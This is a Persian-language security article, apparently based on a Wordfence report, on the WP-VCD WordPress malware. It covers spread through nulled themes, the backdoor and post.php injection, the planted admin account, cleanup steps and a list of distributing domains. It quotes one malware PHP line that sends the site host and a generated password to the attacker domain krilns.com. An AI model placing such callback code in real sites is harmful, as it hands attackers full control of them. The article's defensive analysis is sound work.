بدافزار خطرناک وردپرس WP-VCD


طبق گزارشی که طی چند روز گذشته توسط وردفنس منتشر شد، بدافزار WP-VCD که طی چند ماه گذشته شیوع بسیار زیادی داشته است جز بدافزار های خطرناکی است که طبق معمولا خیلی از سایت های ایرانی را تحت هدف قرار داده است.

شیوع این بدافزار از طریق پلاگین و یا پوسته های نال شده که از منابع غیر معتبر تهیه شده اند صورت می گیرد. حمله کنندگان پس از ورود به سایت با استفاده از تکنیک های کلاه سیاه سئو اقدام به ریدایرکت بازدید های سایت به سوی مسیر های دیگری می کنند و می تواند باعث از دسترس خارج شدن سایت و یا در حالت بدتر، ریدایرکت سایت آلوده شده به مقصدهای دیگر شوند.

بدافزار WP-VCD اولین بار در سال ۲۰۱۷ مشاهده شد، ولی از آن جایی که رشد آن به طور چشمگیری طی چند ماه گذشته افزایش داشته است، پیشتهاد می شود که مالکان سایت های وردپرس حتما از عدم وجود این باگ در سیستم خود اطمینان حاصل کنند.

  1. بررسی شیوع WP-VCD

شیوع آن عموما از طریق وب سایت هایی صورت می گیرند که در جستجو های گوگل رتبه بالایی دارند.مثلا اگر عبارت "eduma theme download" را جستجو کنید، یکی از اولین نتایج سایتی با نام downloadfreethemes.co نمایش داده می شود که یکی از منابع اصلی پخش این بدافزار است.

پلاگین و قالب های نال شده که حاوی این بدافزار هستند می تواند در وب سایت های مختلفی پیدا شوند. این وب سایت ها دقیقا کپی هم هستند و عموما تنها تفاوت آن، عنوان های مختلف در سایت می باشد تا عبارت های مختلفی آن مورد هدف موتور های جستجو قرار گیرند

بدون توجه به اینکه افراد کدام سایت را بازدید کنند، فایل ZIP دانلودی عینا یک فایل می باشد و از دامنه download-freethemes.download . دانلود می شود . از آنجایی که منبع دانلود اصلی فایل ها یک سرور است، همیشه به روز ترین نسخه از بدافزار توسط اشخاص دانلود می شود.

۲. بررسی عملکرد بدافزار

این بدافزار از نظر فنی خیلی پیچیده نیست و عموما کدهای مخرب آن بدون اینکه کدگذاری شده باشند وارد هاست و سایت هدف می شوند.

پس از نصب قالب و یا پلاگین نال شده، ابتدا فایلی با نام class.plugin-modules.php و یا class.themes-modules.php ایجاد می شود. این فایل حاوی اسکریپت اولیه برای آلوده کردن سایت می باشد.

بعد از فعال شدن این فایل، بدافزار محتویات هاست را چک کرده و اسکریپت "back door" را به functions.php هر پوسته ای که پیدا کند اضافه می کند.

اسکریپت backdoor در ابتدا به صورت Base64 ذخیره شده است ولی قبل از وارد شدن به سایت کدگذاری آن باز می شود. اسکریپت همچنین برای جلوگیری از پیدا شدن توسط ادمین ها از modify شدن تاریخ و ساعت فایل جلوگیری می کند.

بعد از ورود موفقیت آمیز اسکریپت backdoor، بدافزار با سرور اصلی خود تماس گرفته و URL سایت به علاوه پسوردی که ایجاد کرده است را برای آن ارسال می کند. این کار به حمله کننده اجازه دسترسی کامل به سایت را می دهد.

ثبت نام سایت در سرور اصلی نیز از طریق HTTP GET و به صورت زیر انجام می شود:

$content [email protected]_get_contents('http://www.krilns.com/o.php?host=' .$_SERVER["HTTP_HOST"] . '&password=' . $install_hash);

دامنه krilns.com یکی از دامنه های شناخته شده این بدافزار می باشد. تا حال حاضر چند صد دامنه مربوط به این بدافزار کشف شده که در ادامه به آن اشاره خواهیم کرد.

بعد از ورود کد backdoor بدافزار اقدام به جستجو برای دیگر سایت های وردپرسی که ممکن است روی هاست و یا سرور قرار داشته باشند می کند و همین مراحل را مجددا برای سایت های جدیدی که پیدا کرده طی می کند.

سپس مرحله دوم نفوذ از طریق اسکریپت جدید که در مسیر wp-includes/wp-vcd.php قرار دارد صورت می گیرد. بدافزار فایل اصلی و سالم وردپرس که در مسیر wp-includes/post.php قرار دارد را ادیت می کند تا هر بار که صفحه سایت لود شد، کدهای درون فایل wp-vcd.php که مخرب می باشد اجرا شود.

۳.بررسی اسکریپت backdoor

اسکریپت backdoor نوشته شده این قابلیت را به حمله کننده می دهد که در زمانی از راه دور کدهای بدافزار را تغییر دهد.

تا به این جا بدافزار عملا غیر فعال بوده و اصطلاحا passive است و مالک سایت عملا متوجه وجود آن نخواهد شد. ولی اسکریپت می تواند هر زمانی از طرف حمله کننده کد های جدیدی (مثلا برای ریدایرکت سایت به آدرس های دیگر) دریافت کند. پس از دریافت بدافزار کد ها در فایلی با نام wp-tmp.php ذخیره می کند.

در مثال قبلی اسکریپت برای دریافت دستورات جدید از دامنه krilns.com استفاده می کرد، ولی معمولا درون اسکریت بک دور نیز در صورت قطع شده دسترسی به نام اصلی، دامنه های دیگری نیز در نظر گرفته شده است.

استفاده از دو دامنه دیگه جهت fallback و از دسترس خارج شدن دامنه اصلی
استفاده از دو دامنه دیگه جهت fallback و از دسترس خارج شدن دامنه اصلی

۴. ایجاد اکانت ادمین وردپرس

در نسخه های قبلی این بدافزار مشاهده شده است که اکانت ادمین در وردپرس با نام کاربری 100010010 و آدرس ایمیل [email protected] روی سایت ها ایجاد می کند تا دسترسی برای حمله کننده فعال شود.

مراحل رفع مشکل در صورت آلودگی

۱. در ابتدا پیشنهاد می شود که قالب هایی که مشکوک می باشند را غیر فعال کرده و به یکی از قالب ها پیشفرض وردپرس تغییر دهید.

۲. نسخه ای از فایل های وردپرس را از مخزن اصلی دانلود کرده و با فایل های فعلی سایت جایگزین کنید.

۳. مسیر wp-includes را چک کنید و هرگونه فایل مشکوک را حذف کنید. به عنوان مثال برخی از فایل مخرب شناخته شده این بدافزار به نام های زیر هستند:

class.wp.php
wp-cd.php
wp-vcd.php
wp-tmp.php
wp-feed.php

۴. دیتابیس سایت را چک کنید. اگر نام کاربری 100010010 و یا هر نام مشکوک دیگر وجود داشت آن را حذف کنید.

۵. این مراحل را برای تمامی سایت هایی که روی هاست دارید انجام دهید.

راه حل نهایی برای جلوگیری از تکرار این موارد، حذف تمام قالب ها و پلاگین های نامعتبر می باشد.


لیست وب سایت های توزیع کننده بدافزار WP-VCD

www.download-freethemes.download

www.downloadfreethemes.co

www.downloadfreethemes.space

www.downloadnulled.pw

www.downloadnulled.top

www.freenulled.top

www.nulledzip.download

www.themesfreedownload.net

www.themesfreedownload.top

www.vestathemes.com